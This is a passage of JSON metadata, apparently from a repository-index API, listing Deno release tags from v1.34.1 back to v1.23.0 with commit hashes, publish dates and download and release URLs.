denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267